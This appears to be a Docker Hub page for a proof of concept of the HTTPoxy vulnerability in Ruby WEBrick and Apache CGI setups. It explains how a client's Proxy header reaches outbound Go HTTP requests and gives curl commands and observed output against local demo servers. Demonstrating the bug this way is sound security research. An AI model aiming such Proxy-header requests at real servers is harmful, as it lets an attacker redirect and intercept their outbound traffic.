Public | Automated Build

Last pushed: 2 years ago
Short Description
A contrived example of the HTTPoxy ( vulnerability for a Ruby WEBrick server
Full Description

Ruby HTTPoxy PoC (gordonchan/ruby-httpoxy)

A somewhat contrived example of the HTTPoxy vulnerability for a Ruby WEBrick server that is serving CGI scripts. Demonstrates:

  • WEBrick::HTTPRequest prepends headers with "HTTP_" and WEBrick::HTTPServlet::CGIHandler lets the HTTP_PROXY header become an environment variable. Same deal with Apache server.
  • Ruby net/http is not vulnerable as per URI::Generic#find_proxy.
  • But if the Ruby CGI script calls a system program that uses an affected HTTP client (e.g. Go net/http), the HTTP_PROXY environment variable will be respected and its value will be used for outbound HTTP requests. :(

Quick Start:

$ ./server
$ curl -H "Proxy:" localhost:4000/ruby.cgi -v

With Docker:

$ docker run --rm -p 4000:4000 gordonchan/ruby-httpoxy
$ curl -H "Proxy:" $(docker-machine ip):4000/ruby.cgi -v

With Docker (Apache):

$ docker run --rm -p 80:80 gordonchan/ruby-apache-httpoxy
$ curl -H "Proxy:" $(docker-machine ip):80/ruby.cgi -v

Observed Output

*   Trying ::1...
* Connected to localhost (::1) port 4000 (#0)
> GET /ruby.cgi HTTP/1.1
> Host: localhost:4000
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy:
< HTTP/1.1 200 OK
< Content-Type: text/html
< Server: WEBrick/1.3.1 (Ruby/2.3.0/2015-12-25)
< Date: Tue, 02 Aug 2016 11:42:57 GMT
< Content-Length: 409
< Connection: Keep-Alive

net/http proxy check:

`./go-proxy-check` (system command):
In Go Land (using net/http)



ruby-httpoxy is Copyright (c) 2016 Gordon Chan and is released under the MIT License. It is free software, and may be redistributed under the terms specified in the LICENSE file.

Docker Pull Command
Source Repository